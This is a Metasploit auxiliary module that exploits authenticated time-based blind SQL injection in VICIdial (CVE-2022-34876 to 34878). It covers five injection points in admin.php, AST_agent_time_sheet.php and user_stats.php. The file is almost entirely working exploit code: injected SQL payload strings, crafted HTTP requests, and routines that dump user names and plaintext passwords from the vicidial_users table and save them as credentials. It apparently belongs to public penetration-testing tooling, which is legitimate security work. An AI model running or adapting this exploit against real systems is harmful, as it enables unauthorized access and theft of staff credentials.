##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VICIdial Multiple Authenticated SQLi',
'Description' => %q{
This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
VICIdial does not encrypt passwords by default.
},
'Author' => [
'h00die' # msf module, discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af'],
[ 'CVE', '2022-34876'], # admin.php
[ 'CVE', '2022-34877'], # AST_agent_time_sheet.php
[ 'CVE', '2022-34878'] # user_stats.php
],
'Actions' => [
['List Users - modify_email_accounts method', { 'Description' => 'Queries username, password for COUNT users' }],
['List Users - access_recordings method', { 'Description' => 'Queries username, password for COUNT users' }],
['List Users - agentcall_email method', { 'Description' => 'Queries username, password for COUNT users' }],
['List Users - agent_time_sheet method', { 'Description' => 'Queries username, password for COUNT users' }],
['List Users - user_stats method', { 'Description' => 'Queries username, password for COUNT users' }],
],
'DefaultAction' => 'List Users',
'DisclosureDate' => '2022-04-19',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options [
OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
OptString.new('USERNAME', [true, 'Valid Username for login', '6666']),
OptString.new('PASSWORD', [true, 'Valid Password for login', '']),
OptString.new('ACTION', [true, 'Valid Password for login', 'List Users - access_recordings method'])
]
end
def post_4a
{
'ADD' => '4A',
'custom_fields_modify' => '0',
'user' => '111',
'pass' => '111',
'force_change_password' => 'N',
'full_name' => '111',
'user_level' => '1',
'user_group' => 'ADMIN',
'phone_login' => '111',
'phone_pass' => '111',
'active' => 'Y',
'voicemail_id' => '',
'email' => '',
'mobile_number' => '',
'user_code' => '',
'user_location' => '',
'territory' => '',
'user_nickname' => '',
'user_new_lead_limit' => '-1',
'agent_choose_ingroups' => '1',
'agent_choose_blended' => '1',
'hotkeys_active' => '0',
'scheduled_callbacks' => '1',
'agentonly_callbacks' => '0',
'next_dial_my_callbacks' => 'NOT_ACTIVE',
'agentcall_manual' => '0',
'manual_dial_filter' => 'DISABLED',
'agentcall_email' => '0',
'agentcall_chat' => '0',
'vicidial_recording' => '1',
'vicidial_transfers' => '1',
'closer_default_blended' => '0',
'user_choose_language' => '0',
'selected_language' => 'defaultEnglish',
'vicidial_recording_override' => 'DISABLED',
'mute_recordings' => 'DISABLED',
'alter_custdata_override' => 'NOT_ACTIVE',
'alter_custphone_override' => 'NOT_ACTIVE',
'agent_shift_enforcement_override' => 'DISABLED',
'agent_call_log_view_override' => 'DISABLED',
'hide_call_log_info' => 'DISABLED',
'agent_lead_search' => 'NOT_ACTIVE',
'lead_filter_id' => 'NONE',
'user_hide_realtime' => '0',
'allow_alerts' => '0',
'preset_contact_search' => 'NOT_ACTIVE',
'max_inbound_calls' => '0',
'max_inbound_filter_enabled' => '0',
'max_inbound_filter_min_sec' => '-1',
'max_hopper_calls' => '0',
'max_hopper_calls_hour' => '0',
'wrapup_seconds_override' => '-1',
'ready_max_logout' => '-1',
'status_group_id' => '',
'custom_one' => '',
'custom_two' => '',
'custom_three' => '',
'custom_four' => '',
'custom_five' => '',
'qc_enabled' => '0',
'qc_user_level' => '1',
'qc_pass' => '0',
'qc_finish' => '0',
'qc_commit' => '0',
'realtime_block_user_info' => '0',
'admin_hide_lead_data' => '0',
'admin_hide_phone_data' => '0',
'ignore_group_on_search' => '0',
'user_admin_redirect_url' => '',
'view_reports' => '0',
'access_recordings' => '0',
'alter_agent_interface_options' => '0',
'modify_users' => '0',
'change_agent_campaign' => '0',
'delete_users' => '0',
'modify_usergroups' => '0',
'delete_user_groups' => '0',
'modify_lists' => '0',
'delete_lists' => '0',
'load_leads' => '0',
'modify_leads' => '0',
'export_gdpr_leads' => '0',
'download_lists' => '0',
'export_reports' => '0',
'delete_from_dnc' => '0',
'modify_campaigns' => '0',
'campaign_detail' => '0',
'delete_campaigns' => '0',
'modify_ingroups' => '0',
'delete_ingroups' => '0',
'modify_inbound_dids' => '0',
'delete_inbound_dids' => '0',
'modify_custom_dialplans' => '0',
'modify_remoteagents' => '0',
'delete_remote_agents' => '0',
'modify_scripts' => '0',
'delete_scripts' => '0',
'modify_filters' => '0',
'delete_filters' => '0',
'ast_admin_access' => '0',
'ast_delete_phones' => '0',
'modify_call_times' => '0',
'delete_call_times' => '0',
'modify_servers' => '0',
'modify_shifts' => '0',
'modify_phones' => '0',
'modify_carriers' => '0',
'modify_email_accounts' => '0',
'vKik' => 'vKik',
'modify_labels' => '0',
'modify_colors' => '0',
'modify_languages' => '0',
'modify_statuses' => '0',
'modify_voicemail' => '0',
'modify_audiostore' => '0',
'modify_moh' => '0',
'modify_tts' => '0',
'modify_contacts' => '0',
'callcard_admin' => '0',
'modify_auto_reports' => '0',
'add_timeclock_log' => '0',
'modify_timeclock_log' => '0',
'delete_timeclock_log' => '0',
'manager_shift_enforcement_override' => '0',
'pause_code_approval' => '0',
'admin_cf_show_hidden' => '0',
'modify_ip_lists' => '0',
'ignore_ip_list' => '0',
'two_factor_override' => 'NOT_ACTIVE',
'vdc_agent_api_access' => '0',
'api_list_restrict' => '0',
'api_allowed_functions[]' => 'ALL_FUNCTIONS',
'api_only_user' => '0',
'modify_same_user_level' => '1',
'alter_admin_interface_options' => '1',
'SUBMIT' => 'SUBMIT'
}
end
def basic_auth
user_pass = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
{
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
}
end
def inject_admin_page(param, payload)
data = post_4a
d = Rex::Text.rand_text_numeric(4)
data[param] = "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),
'headers' => basic_auth,
'vars_post' => data
})
fail_with Failure::Unreachable, 'Connection failed' unless res
end
def run_host(ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),
'headers' => basic_auth
})
fail_with(Failure::Unreachable, 'Failed to load website') unless res
fail_with(Failure::NoAccess, 'Invalid login/password') if res.code == 401
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
d = Rex::Text.rand_text_numeric(4)
if datastore['ACTION'] == 'List Users - modify_email_accounts method'
inject_admin_page('modify_email_accounts', payload)
elsif datastore['ACTION'] == 'List Users - access_recordings method'
inject_admin_page('access_recordings', payload)
elsif datastore['ACTION'] == 'List Users - agentcall_email method'
inject_admin_page('agentcall_email', payload)
elsif datastore['ACTION'] == 'List Users - agent_time_sheet method'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'vicidial', 'AST_agent_time_sheet.php'),
'headers' => basic_auth,
'vars_get' => {
'agent' => "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
}
})
elsif datastore['ACTION'] == 'List Users - user_stats method'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'vicidial', 'user_stats.php'),
'headers' => basic_auth,
'vars_get' => {
'DB' => '',
'pause_code_rpt' => '',
'park_rpt' => '1',
'did_id' => '',
'did' => '',
'begin_date' => Date.today.to_s,
'end_date' => Date.today.to_s,
'user' => '',
'submit' => 'submit',
'search_archived_data' => '',
'NVAuser' => '',
'file_download' => "1' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
}
})
end
end
unless @sqli.test_vulnerable
print_bad("#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay.")
return
end
columns = ['user', 'pass']
print_status('Enumerating Usernames and Password Hashes')
data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])
table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 1, 'Columns' => columns)
data.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :password,
private_data: user[1],
service_name: 'VICIdial',
address: ip,
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good('Dumped table contents:')
print_line(table.to_s)
end
end
